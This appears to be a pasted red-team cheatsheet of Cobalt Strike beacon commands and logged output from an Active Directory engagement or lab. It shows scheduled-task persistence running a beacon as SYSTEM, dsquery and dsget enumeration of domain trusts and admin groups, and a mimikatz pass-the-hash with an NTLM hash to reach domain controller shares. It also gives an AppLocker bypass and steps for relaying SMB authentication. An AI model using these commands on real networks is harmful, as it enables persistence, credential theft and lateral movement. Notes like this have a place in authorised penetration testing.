savsanta icon

k54_Cheatsheet_Notes

savsanta | PRO | 11/08/22 04:32:45 PM UTC | 0 ⭐ | 626 👁️ | Never ⏰ | []
text |

8.73 KB

|

None

|

0 👍

/

0 👎

 Quickie Pastable
shell schtasks /create /S 192.168.105.104 /TN X-Cobalt-Strike-Remote-Persistence /TR C:\WIndows\System32\testbeacon.exe /SC ONSTART /RU SYSTEM
shell schtasks /run /S 192.168.105.104 /TN X-Cobalt-Strike-Remote-Persistence
  # Finding Trust Domain Relationships in DSQUery. use to find thngs like Admins oe Enterpise Admins  that we can reuse credentials in a whole different domain (ie the Austin Gretechel scenarios)
shell dsquery * -filter (objectclass=trusteddomain) -attr flatname trusttype trustdirection  -l
  Tip 1) Bounce back between runnign dsquery from system and froman actual user account due ot issues with some users not being authenticated
 ----
shell dsquery * -filter "(objectclass=computer)" -attr description  samaccountname  name  operatingsystem dnshostname -d gretchel
[*] Tasked beacon to run: dsquery * -filter "(objectclass=computer)" -attr description  samaccountname  name  operatingsystem dnshostname -d gretchel
[+] host called home, sent: 154 bytes
[+] received output:
dsquery failed:The server is not operational.
type dsquery /? for help.
[+] received output:
  description    samaccountname    name            operatingsystem                    dnshostname                  
                 GRETCHEL-DC1$     GRETCHEL-DC1    Windows Server 2012 R2 Standard    gretchel-DC1.gretchel.local  
   [*] Tasked beacon to run: dsget group "CN=Enterprise Admins,CN=Users,DC=gretchel,DC=local" -members
[+] host called home, sent: 104 bytes
[+] received output:
"CN=Danson\, chris M,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
"CN=Lazarus\, Alan W,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
"CN=Laredo\, Daryl S,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
"CN=Chen\, Tony F,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
"CN=Administrator,CN=Users,DC=gretchel,DC=local"
 shell dsget group "CN=Domain Admins,CN=Users,DC=gretchel,DC=local" -members
[*] Tasked beacon to run: dsget group "CN=Domain Admins,CN=Users,DC=gretchel,DC=local" -members
[+] host called home, sent: 100 bytes
[+] received output:
"CN=Administrator,CN=Users,DC=gretchel,DC=local
 beacon> shell nslookup gretchel-dc1
[*] Tasked beacon to run: nslookup gretchel-dc1
[+] host called home, sent: 52 bytes
[+] received output:
Server:  gretchel-dc1.gretchel.local
Address:  172.16.1.10
 eacon> shell dsquery server -forest
[*] Tasked beacon to run: dsquery server -forest
[+] host called home, sent: 53 bytes
[+] received output:
"CN=GRETCHEL-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
"CN=AUS-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
"CN=CHI-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
"CN=CHI-DC2,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
----
Weirdness around ls/shell dir of the directory on the parent DC. ONly wokred when i used builtin ls of CS
 beacon> shell dir \\172.16.1.10\C$
[*] Tasked beacon to run: dir \\172.16.1.10\C$
[+] host called home, sent: 51 bytes
[-] could not spawn C:\Windows\system32\cmd.exe /C dir \\172.16.1.10\C$ (token) with extended startup information. Reset ppid, disable blockdlls, or rev2self to drop your token.
beacon> pth GRETCHEL.local\chris.danson.ea eda099c1520936a2966ab0c04b7a7296
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:chris.danson.ea /domain:GRETCHEL.local /ntlm:eda099c1520936a2966ab0c04b7a7296 /run:"%COMSPEC% /c echo 12719d8990e > \\.\pipe\4b2017" command
[+] host called home, sent: 297614 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user	: chris.danson.ea
domain	: GRETCHEL.local
program	: C:\Windows\system32\cmd.exe /c echo 12719d8990e > \\.\pipe\4b2017
impers.	: no
NTLM	: eda099c1520936a2966ab0c04b7a7296
  |  PID  3856
  |  TID  2496
  |  LSA Process is now R/W
  |  LUID 0 ; 190663225 (00000000:0b5d4a39)
  \_ msv1_0   - data copy @ 000000D74557AFA0 : OK !
  \_ kerberos - data copy @ 000000D745528F38
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000000D74560B0F8 (16) -> null
 beacon> shell dir \\GRETCHEL-DC1\C$
[*] Tasked beacon to run: dir \\GRETCHEL-DC1\C$
[+] host called home, sent: 52 bytes
[-] could not spawn C:\Windows\system32\cmd.exe /C dir \\GRETCHEL-DC1\C$ (token) with extended startup information. Reset ppid, disable blockdlls, or rev2self to drop your token.
beacon> ls \\GRETCHEL-DC1\C$
[*] Tasked beacon to list files in \\GRETCHEL-DC1\C$
[+] host called home, sent: 35 bytes
[*] Listing: \\GRETCHEL-DC1\C$\
  beacon> ls \\GRETCHEL-DC1\sysvol
[*] Tasked beacon to list files in \\GRETCHEL-DC1\sysvol
[+] host called home, sent: 39 bytes
[*] Listing: \\GRETCHEL-DC1\sysvol\
  Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/09/2022 09:54:27   gretchel.local
  ### Rev2Self verifies that you do need pass the hash as now i cant ls the anything
beacon> rev2self
[*] Tasked beacon to revert token
[+] host called home, sent: 8 bytes
beacon> ls \\GRETCHEL-DC1\sysvol
[*] Tasked beacon to list files in \\GRETCHEL-DC1\sysvol
[+] host called home, sent: 39 bytes
[-] could not open \\GRETCHEL-DC1\sysvol\*: 5
beacon> ls \\GRETCHEL-DC1\C$
[*] Tasked beacon to list files in \\GRETCHEL-DC1\C$
[+] host called home, sent: 35 bytes
[-] could not open \\GRETCHEL-DC1\C$\*: 5
  #### How to FInd the the 2F token number used as thier logon samaccount ID  for the Workstation Admin accounts that have remote logon capaiblity using DSQUERY
   ### Socks
gotta have SOCKS AND PORTFWD together they aren't interchangeable. when trying to hit th e ssh port thru socks/proxychains
   beacon> reg query x64 HKLM\software\policies\microsoft\windows\srpv2\Script\9428c672-5fc3-47f4-808a-a0011f36dd2c
[*] Tasked beacon to query HKLM\software\policies\microsoft\windows\srpv2\Script\9428c672-5fc3-47f4-808a-a0011f36dd2c (x64)
[+] host called home, sent: 2701 bytes
[+] received output:
Value                    <FilePathRule Id="9428c672-5fc3-47f4-808a-a0011f36dd2c" Name="(Default Rule) All scripts located in the Windows folder" Description="Allows members of the Everyone group to run scripts that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePathCondition Path="%WINDIR%\*"/></Conditions></FilePathRule>
  beacon> reg query x64 HKLM\software\policies\microsoft\windows\srpv2\Script\ed97d0cb-15ff-430f-b82c-8d7832957725
[*] Tasked beacon to query HKLM\software\policies\microsoft\windows\srpv2\Script\ed97d0cb-15ff-430f-b82c-8d7832957725 (x64)
[+] host called home, sent: 2701 bytes
[+] received output:
Value                    <FilePathRule Id="ed97d0cb-15ff-430f-b82c-8d7832957725" Name="(Default Rule) All scripts" Description="Allows members of the local Administrators group to run all scripts." UserOrGroupSid="S-1-5-32-544" Action="Allow"><Conditions><FilePathCondition Path="*"/></Conditions></FilePathRule>
  # The syntax to use DSQUERY.exe thru an Application Whitelist Bypass custom C# code
# beacon> execute-assembly /mnt/supershare/applocker-bypas/applby.exe C:\transfer\dsquery.exe * -filter *
  # PortForwarding to Relay SMB Authentication Requires some KEY THINGS
   Cobalt Strike Client ---> CS Teamserver ----> Customer Machine on Local Customer Network ----> Customer Target Domain Controller for SMB Auth
	1			2				3					4
 1. The porfwd should be run on machine 3 with the target ip of the DC (machine 4) and target port (445)
2. The SMB Auth relay via Pass-The-Hash must be relayed thru an additional (not depicted in the diagram) machine that is a Windows box with an implant calling back to teamserver as SYSTEM.
3. On the Windows Relayer box change the /etc/hosts file to make an DNSname alias for the Target Customer Domain controller but put hte IP as the out-of-band for the Kali Teamserver IP
4. Execute the pass-the-hash on the beacon that corresponsds to your Windows Relayer box. Make sure your SYSTEM
5. Execute all "passing queries" on the Windows Relayer Box. (shell dir \\TARGETDC\C$\)
    ------
When get error:
dsquery failed:The operation being requested was not performed because the user has not been authenticated.
type dsquery /? for help.
 try to run with the '-d' parameter if usig cross-domain trust
beacon> shell dsquery * -filter (name=*web*) -attr * -d austin
[*] Tasked beacon to run: dsquery * -filter (name=*web*) -attr * -d austin
[+] host called home, sent: 79 bytes
[+] received output:
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
objectClass: computer
cn: AUS-WEB
 

Comments